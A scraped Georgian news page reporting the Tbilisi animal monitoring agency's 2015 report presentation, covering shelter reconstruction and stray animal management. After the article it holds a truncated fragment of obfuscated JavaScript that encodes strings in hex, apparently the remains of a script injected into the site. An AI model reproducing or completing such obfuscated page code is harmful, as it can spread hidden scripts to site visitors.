თბილისის მერიაში ცხოველთა მონიტორინგის სააგენტოს ანგარიშის პრეზენტაცია გაიმართა
თბილისის მერიაში ცხოველთა მონიტორინგის სააგენტოს ანგარიშის პრეზენტაცია გაიმართა
თბილისის მერიაში ცხოველთა მონიტორინგის სააგენტოს 2015 წლის საქმიანობის ანგარიშის პრეზენტაცია გაიმართა.

თბილისის მერიის ცნობით, ანგარიშის წარდგენისას სააგენტოს დირექტორმა თემურ ფხალაძემ აღნიშნა, რომ იკვეთება პროგრესი ცხოველების მოვლა-პატრონობისა და მათი პოპულაციების მართვა-კონტროლის გასაუმჯობესებლად თანამედროვე, ჰუმანურ, განვითარებულ ქვეყნებში აპრობირებული მეთოდებით. თემურ ფხალაძემ წარადგინა მუნიციპალური თავშესაფრის საქმიანობის ანალიზი და რეკონსტრუქციის შედეგები.

სააგენტოს ხელმძღვანელმა ასევე მიმოიხილა ქალაქში უმეთვალყურეო ცხოველების არსებობით შექმნილი პრობლემები, მათი გადაჭრის გზები და ამ მიზნით დაგეგმილი პროექტები.

თემურ ფხალაძის განცხადებით, მნიშვნელოვანია მოსახლეობის ცნობიერების ამაღლება. ანგარიშის წარდგენისას ხაზი გაესვა ე.წ. "სანიტარულ-ვეტერინარული კორდონის" ამოქმედების
მნიშვნელობას ქალაქისათვის, რომელსაც წინ უსწრებდა უპატრონო ცხოველების დათვლის პროცესი.

თბილისის მერიაში გამართულ შეხვედრას თბილისის მერის
მოადგილე, ირაკლი ლექვინაძე, ცხოველთა მონიტორინგის სააგენტოსა და არასამთავრობო ორგანიზაციების წარმომადგენლები ესწრებოდნენ.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o {var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
კომენტარი ჯერ არ გაკეთებულა
დახმარება
  • რა ვაჭამოთ?
  • ჯიშები
  • სად ვიყიდოთ?
გამოკითხვა
რომელი ბრენდის საკვებს აჭმევთ თქვენს ძაღლს?